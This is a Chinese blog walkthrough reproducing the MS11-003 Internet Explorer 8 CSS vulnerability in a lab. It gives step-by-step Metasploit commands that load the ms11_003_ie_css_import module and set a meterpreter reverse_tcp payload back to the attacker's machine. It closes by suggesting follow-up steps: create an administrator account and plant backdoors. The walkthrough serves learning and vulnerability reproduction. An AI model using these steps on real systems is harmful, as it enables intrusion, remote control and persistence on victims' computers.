0x01漏洞简介

ms11-003(windows7IE溢出攻击) 是利用IE8中对css的解析存在一个问题,导致任何访问包含非法css的页面将导致IE8崩溃重启的漏洞。

0x02环境准备

攻击机:kali Linux      IP:172.16.11.7

靶    机:Win7旗舰版  IP:172.16.11.17

0x03复现步骤

首先需要将靶机防火墙关闭

 

 

 

 1.在kali中加载msf工具

 

 

 

2.搜索漏洞利用模块

命令:search ms11-003

3.使用exploit/windows/browser/ms11_003_ie_css_import攻击模块

命令:use exploit/windows/browser/ms11_003_ie_css_import

 

显示 payloads:show payloads
选择 windows/meterpreter/reverse_tcp这一条
设置:set payload windows/meterpreter/reverse_tcp

 

 

 

set srvhost 172.16.11.7(攻击机ip)
set lhost 172.16.11.7(攻击机ip)

 

 

 

4.查看配置情况

show options

 

 

 

URIPATH默认为随机数,可以不设置,为了方便后面使用,在这里可任意设置一个固定值

 

 

 

 5.以上参数配置完成后可进行攻击

命令: run (或exploit)

 

 

 

会生成一条攻击url,将此url复制到靶机IE浏览器地址栏中访问

 

 

 

同时kali中会返回如下信息:

 

 

 

 6.出现该信息证明已经攻击成功,可以sessions命令查看会话

 

 

 

选择任意会话连接,即可进入靶机控制台

 

 

 此时可进行进一步渗透,创建管理员账户,搭配其他工具留后门等。出现乱码时可用”chcp65001″命令更改编码。该漏洞复现完成.

版权声明:本文为Aurstin原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/Aurstin/p/13163014.html